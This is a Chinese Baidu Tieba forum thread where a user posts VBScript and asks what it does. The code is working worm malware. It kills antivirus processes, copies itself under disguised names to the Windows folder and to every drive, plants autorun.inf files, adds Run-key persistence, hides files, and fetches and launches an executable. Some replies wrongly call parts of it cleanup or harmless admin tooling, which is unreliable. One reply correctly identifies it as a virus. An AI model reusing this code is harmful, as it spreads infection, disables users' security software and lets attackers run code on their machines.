您尚未登录，请登陆后浏览更精彩内容！
Powered by求高手解释下这些vbs代码_vbs吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：8,297贴子：
求高手解释下这些vbs代码收藏
'markerti=1On Error Resume Next 'marker'slow and silent (sas)1.0On Error Resume Next Set wshShell = WScript.CreateObject("WScript.Shell") wshShell.run "ntsd -c q -pn 360Tray.exe",0wshShell.run "cmd /c attrib -s -r -h c:\autorun.inf & rd /s/q z:\autorun.inf",0wshShell.run "cmd /c attrib -s -r -h c:\autorun.inf & rd /s/q l:\autorun.inf",0wshShell.run "cmd /c attrib -s -r -h c:\autorun.inf & rd /s/q k:\autorun.inf",0wshShell.run "cmd /c attrib -s -r -h c:\autorun.inf & rd /s/q n:\autorun.inf",0wshShell.run "cmd /c attrib -s -r -h c:\autorun.inf & rd /s/q g:\autorun.inf",0wshShell.run "cmd /c attrib -s -r -h c:\autorun.inf & rd /s/q h:\autorun.inf",0wshShell.run "cmd /c attrib -s -r -h c:\autorun.inf & rd /s/q i:\autorun.inf",0wshShell.run "cmd /c attrib -s -r -h c:\autorun.inf & rd /s/q j:\autorun.inf",0Set ws = CreateObject("Wscript.Shell")for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_if ps.Name="KVMonXP.kxp" thenws.run "ntsd -c q -pn KVMonXP.kxp",0else if ps.Name="nod32kui.exe" thenws.run "ntsd -c q -pn nod32kui.exe",0ws.run "ntsd -c q -pn nod32krn.exe",0else if ps.Name="rfwsrv.exe" thenws.run "ntsd -c q -pn rfwsrv.exe",0else if ps.Name="RavMon.exe" thenws.run "ntsd -c q -pn RavMon.exe",0ws.run "ntsd -c q -pn CCenter.exe",0ws.run "ntsd -c q -pn Ravmond.exe",0else if ps.Name="KAVStart.EXE" thenws.run "ntsd -c q -pn KAVStart.EXE",0ws.run "ntsd -c q -pn Rfw.exe",0ws.run "ntsd -c q -pn KavRFW.exe",0end ifend ifend ifend ifend ifNEXT
挂机一个月得百万，你还蓝瘦香菇么？
on error resume nextdim mysource,winpath,flashdrive,aa951,mf,atr,tf,rg,nt,cc,hm,suckatr = "[autorun]"&vbcrlf&"shell\Auto\command="&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.exe..VBs."set suck = 5set aa951 = createobject("Scripting.FileSystemObject")set mf = aa951.getfile(Wscript.ScriptFullname)set rg = createobject("WScript.Shell")rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerRun\system",winpath&"\.MS32DLL.dll.exe..VBs."rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.exe..VBs."rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerRun\windos","wscript.exe "&winpath&"\boot.ini"rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nvdll32","wscript.exe "&winpath&"\boot.ini"rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"dim text,sizesize = mf.sizeset text=mf.openastextstream(1,-2)cc = text.readlinedo while not text.atendofstreammysource=mysource&text.readlinemysource=mysource & vbcrlfloop
Set winpath = aa951.getspecialfolder(0)set tf = aa951.getfile(winpath & "\.MS32DLL.dll.exe..VBs.")tf.attributes = 32set tf=aa951.createtextfile(winpath & "\.MS32DLL.dll.exe..VBs.",2,true)tf.write "'ker"&vbcrlf&mysourcetf.closeset tf = aa951.getfile(winpath & "\.MS32DLL.dll.exe..VBs.")tf.attributes = 39Set winpath = aa951.getspecialfolder(0)set tf = aa951.getfile(winpath & "\boot.ini")tf.attributes = 32set tf=aa951.createtextfile(winpath & "\boot.ini",2,true)tf.write "'ker"&vbcrlf&mysourcetf.closeset tf = aa951.getfile(winpath & "\boot.ini")tf.attributes = 39if cc = "'mark" thenrg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullnameend ifif cc = "'marker" thenrg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullnameend ifdofor each flashdrive in aa951.driveshm="'mark"If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path && "A:" thenif(flashdrive.drivetype=2) thenhm = "'marker"end ifset tf=aa951.getfile(flashdrive.path &"\.MS32DLL.dll.exe..VBs.")tf.attributes =32set tf=aa951.createtextfile(flashdrive.path &"\.MS32DLL.dll.exe..VBs.",2,true)tf.write hm&vbcrlf&mysourcetf.closeset tf=aa951.getfile(flashdrive.path &"\.MS32DLL.dll.exe..VBs.")tf.attributes =39set tf =aa951.getfile(flashdrive.path &"\autorun.inf")tf.attributes = 32set tf=aa951.createtextfile(flashdrive.path &"\autorun.inf",2,true)tf.write atrtf.closeset tf =aa951.getfile(flashdrive.path &"\autorun.inf")tf.attributes=39end ifrg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerRun\system",winpath&"\.MS32DLL.dll.exe..VBs."rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.exe..VBs."rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerRun\windos","wscript.exe "&winpath&"\boot.ini"rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nvdll32","wscript.exe /E:vbs "&winpath&"\boot.ini"rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"nextif cc && "'mark" thenWscript.sleep 20000end if
if ti=1 then On Error Resume Next strComputer="." For Each objProcess in colProcessList objProcess.Terminate() Next On Error Resume Next Dim iRemote,iLocal,wshShell iLocal=LCase(WScript.Arguments(1))iRemote=LCase(WScript.Arguments(0))Set xPost=CreateObject("Microsoft.XMLHTTP")set objShell=wscript.createObject("wscript.shell")xPost.Open "GET","",0 ' xPost.Send()Set sGet=CreateObject("ADODB.Stream")sGet.Mode=3sGet.Type=1sGet.Open()sGet.Write(xPost.responseBody).sasGet.SaveToFile "c:\windows\boot6.exe",2 Wscript.sleep 10000'Set uio = WScript.CreateObject("WScript.Shell") 'uio.run "cmd /c&& c:\windows\boot6.exe",0Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")objProcess.Create "c:\windows\boot6.exe", Null, Nullti=0end ifloop while cc && "'marker"
快试试吧，可以对自己使用挽尊卡咯~◆◆
批处理的滚到批处理吧去问
说明：略
总结：貌似要干坏事
快试试吧，可以对自己使用挽尊卡咯~◆◆
1楼是清理几个常见U盘病毒的
2楼应该是想简化开机过程以及优化系统环境的，不过具体语法有没有错漏就没认真看了
3、4楼不太看得懂，就不妄下定论了不过似乎都是在做些把系统的环境设置成特定数据那样的事，虽然具体功能不明，但是恶意代码的可能性不大…… 看最后那地址，怎么有点像是一些公司内网的IP啊哈？局域网管理小工具么？
后面的代码明显是病毒。它在每个盘下面都写了AUTORUN.INF自动运行的配置文件，而且修改了系统配置文件。而且后台从网站下载了一个病毒程序gz.exe 我们从代码对注册表的操作部分不难看出以下几个问题：1.开启驱动器的自动运行功能，以便你打开硬盘的时候自动运行病毒程序。2.注册自己编写的DLL动态链接库文件，实现VBS加载能实现个人目的的DLL文件中的函数。3.关闭了显示隐藏文件的功能，使你无法查看应藏的文件。
登录百度帐号推荐应用
为兴趣而生，贴吧更懂你。或